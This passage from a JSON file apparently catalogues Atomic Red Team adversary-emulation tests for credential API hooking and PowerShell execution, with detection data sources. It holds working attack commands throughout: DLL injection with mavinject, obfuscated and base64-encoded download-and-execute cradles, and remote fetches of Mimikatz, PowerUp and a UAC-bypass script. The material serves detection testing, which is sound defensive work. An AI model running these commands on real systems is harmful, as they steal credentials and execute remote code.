PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n" + ], + "commands": [ + { + "command": "mavinject $pid /INJECTRUNNING PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "source": "atomics/T1056.004/T1056.004.yaml", + "name": "Atomic Red Team Test - Input Capture: Credential API Hooking" + }, + { + "command": "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n", + "source": "atomics/T1056.004/T1056.004.yaml", + "name": "Atomic Red Team Test - Input Capture: Credential API Hooking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.004", + "display_name": "Input Capture: Credential API Hooking", + "atomic_tests": [ + { + "name": "Hook PowerShell TLS Encrypt/Decrypt Messages", + "auto_generated_guid": "de1934ea-1fbf-425b-8795-65fb27dd7e33", + "description": "Hooks functions in PowerShell to read TLS Communications\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "Dll To Inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll" + }, + "server_name": { + "description": "TLS Server To Test Get Request", + "type": "Url", + "default": "https://www.example.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1056.004x64.dll must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + } + ], + 
"executor": { + "command": "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.001", + "command_list": [ + "powershell.exe \"IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"\n", + "write-host \"Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\\T1059.001\\src\" -ForegroundColor Cyan\nimport-module PathToAtomicsFolder\\T1059.001\\src\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + 
"$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "Powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject 
MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX\"\n", + "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()\"\n", + "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "powershell.exe -version 2 -Command Write-Host $PSVersion\n", + "Add-Content -Path $env:TEMP\\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path $env:TEMP\\NTFS_ADS.txt -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "New-PSSession -ComputerName $env:COMPUTERNAME\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -Execute -ErrorAction 
Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop", + "powershell.exe -e 
JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==\n", + "$malcmdlets = \"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", \"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", \"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;", + "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";", + "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> 
C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n", + "Get-Process -Name \"powershell\" | Stop-Process\n", + "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n", + "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n", + "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==\n" + ], + "commands": [ + { + "command": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + 
"name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "write-host \"Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\\T1059.001\\src\" -ForegroundColor Cyan\nimport-module PathToAtomicsFolder\\T1059.001\\src\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem 
Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Powershell.exe \"IEX 
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex 
([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -version 2 -Command Write-Host $PSVersion\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Add-Content -Path $env:TEMP\\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path $env:TEMP\\NTFS_ADS.txt -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "New-PSSession -ComputerName $env:COMPUTERNAME\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": 
"Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction 
Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "$malcmdlets = \"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", \"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", 
